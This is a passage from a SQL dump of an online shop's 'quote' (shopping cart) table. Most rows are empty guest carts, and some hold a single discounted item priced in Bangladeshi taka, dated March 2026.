(589, 1, '2026-03-23 04:32:16', '2026-03-23 04:32:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(590, 1, '2026-03-23 08:17:37', '2026-03-23 08:17:37', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(591, 1, '2026-03-23 12:27:41', '2026-03-23 12:27:41', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(592, 1, '2026-03-23 16:15:46', '2026-03-23 16:15:46', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(593, 1, '2026-03-23 17:52:11', '2026-03-23 17:52:11', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(594, 1, '2026-03-23 21:43:12', '2026-03-23 21:43:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(595, 1, '2026-03-24 01:06:12', '2026-03-24 01:06:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(596, 1, '2026-03-24 04:31:33', '2026-03-24 04:31:33', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(597, 1, '2026-03-24 08:00:51', '2026-03-24 08:00:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(598, 1, '2026-03-24 11:43:17', '2026-03-24 11:43:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(599, 1, '2026-03-24 14:04:58', '2026-03-24 14:04:58', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(600, 1, '2026-03-24 15:31:10', '2026-03-24 15:31:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(601, 1, '2026-03-24 19:21:17', '2026-03-24 19:21:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(602, 1, '2026-03-24 23:26:38', '2026-03-24 23:26:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(603, 1, '2026-03-25 00:22:57', '2026-03-25 00:22:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 514.4000, 514.4000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, '66.249.64.131', '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 643.0000, 643.0000, 514.4000, 514.4000, 1, 0, NULL, NULL, 0),
(604, 1, '2026-03-25 03:29:59', '2026-03-25 03:29:59', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0);
INSERT INTO `quote` (`entity_id`, `store_id`, `created_at`, `updated_at`, `converted_at`, `is_active`, `is_virtual`, `is_multi_shipping`, `items_count`, `items_qty`, `orig_order_id`, `store_to_base_rate`, `store_to_quote_rate`, `base_currency_code`, `store_currency_code`, `quote_currency_code`, `grand_total`, `base_grand_total`, `checkout_method`, `customer_id`, `customer_tax_class_id`, `customer_group_id`, `customer_email`, `customer_prefix`, `customer_firstname`, `customer_middlename`, `customer_lastname`, `customer_suffix`, `customer_dob`, `customer_note`, `customer_note_notify`, `customer_is_guest`, `remote_ip`, `applied_rule_ids`, `reserved_order_id`, `password_hash`, `coupon_code`, `global_currency_code`, `base_to_global_rate`, `base_to_quote_rate`, `customer_taxvat`, `customer_gender`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `is_changed`, `trigger_recollect`, `ext_shipping_info`, `gift_message_id`, `is_persistent`) VALUES
(605, 1, '2026-03-25 04:45:12', '2026-03-25 04:45:12', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(606, 1, '2026-03-25 04:45:39', '2026-03-25 04:45:39', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(607, 1, '2026-03-25 04:45:42', '2026-03-25 04:45:42', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(608, 1, '2026-03-25 04:45:45', '2026-03-25 04:45:45', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(609, 1, '2026-03-25 04:45:48', '2026-03-25 04:45:48', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(610, 1, '2026-03-25 04:45:51', '2026-03-25 04:45:51', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(611, 1, '2026-03-25 04:45:54', '2026-03-25 04:45:54', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(612, 1, '2026-03-25 04:45:57', '2026-03-25 04:45:57', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(613, 1, '2026-03-25 04:46:00', '2026-03-25 04:46:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(614, 1, '2026-03-25 04:46:03', '2026-03-25 04:46:03', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(615, 1, '2026-03-25 04:46:06', '2026-03-25 04:46:06', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(616, 1, '2026-03-25 04:46:10', '2026-03-25 04:46:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(617, 1, '2026-03-25 04:46:13', '2026-03-25 04:46:13', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(618, 1, '2026-03-25 04:46:16', '2026-03-25 04:46:16', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(619, 1, '2026-03-25 04:46:26', '2026-03-25 04:46:26', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(620, 1, '2026-03-25 07:27:24', '2026-03-25 07:27:24', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(621, 1, '2026-03-25 11:36:14', '2026-03-25 11:36:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(622, 1, '2026-03-25 15:42:17', '2026-03-25 15:42:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(623, 1, '2026-03-25 19:53:17', '2026-03-25 19:53:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(624, 1, '2026-03-25 20:46:46', '2026-03-25 20:46:57', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(625, 1, '2026-03-25 20:54:32', '2026-03-25 20:54:33', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(626, 1, '2026-03-25 22:25:35', '2026-03-25 22:25:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(627, 1, '2026-03-26 00:59:19', '2026-03-26 00:59:23', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(628, 1, '2026-03-26 03:12:31', '2026-03-26 03:12:31', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(629, 1, '2026-03-26 04:11:33', '2026-03-26 04:11:35', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(630, 1, '2026-03-26 07:20:40', '2026-03-26 07:20:42', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(631, 1, '2026-03-26 11:06:31', '2026-03-26 11:06:32', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(632, 1, '2026-03-26 11:08:21', '2026-03-26 11:08:21', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(633, 1, '2026-03-26 15:38:25', '2026-03-26 15:38:37', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(634, 1, '2026-03-26 16:04:00', '2026-03-26 16:04:00', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(635, 1, '2026-03-26 19:07:14', '2026-03-26 19:07:14', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(636, 1, '2026-03-26 19:49:52', '2026-03-26 19:50:01', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(637, 1, '2026-03-26 20:27:35', '2026-03-26 20:27:35', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(638, 1, '2026-03-27 00:23:35', '2026-03-27 00:23:40', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(639, 1, '2026-03-27 02:41:22', '2026-03-27 02:41:22', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(640, 1, '2026-03-27 05:13:19', '2026-03-27 05:13:20', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(641, 1, '2026-03-27 08:00:07', '2026-03-27 08:00:07', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(642, 1, '2026-03-27 08:00:17', '2026-03-27 08:00:17', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(643, 1, '2026-03-27 08:00:44', '2026-03-27 08:00:44', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(644, 1, '2026-03-27 08:01:10', '2026-03-27 08:01:10', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(645, 1, '2026-03-27 08:01:36', '2026-03-27 08:01:36', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(646, 1, '2026-03-27 10:04:14', '2026-03-27 10:04:31', NULL, 1, 0, 0, 1, 1.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 187.2000, 187.2000, NULL, NULL, 3, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, '2,3', NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 234.0000, 234.0000, 187.2000, 187.2000, 1, 0, NULL, NULL, 0),
(647, 1, '2026-03-27 10:22:43', '2026-03-27 10:22:43', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
(648, 1, '2026-03-27 11:14:38', '2026-03-27 11:14:38', NULL, 1, 0, 0, 0, 0.0000, 0, 0.0000, 0.0000, 'BDT', 'BDT', 'BDT', 0.0000, 0.0000, NULL, NULL, NULL, 0, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, NULL, NULL, NULL, 'BDT', 1.0000, 1.0000, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 1, 0, NULL, NULL, 0),
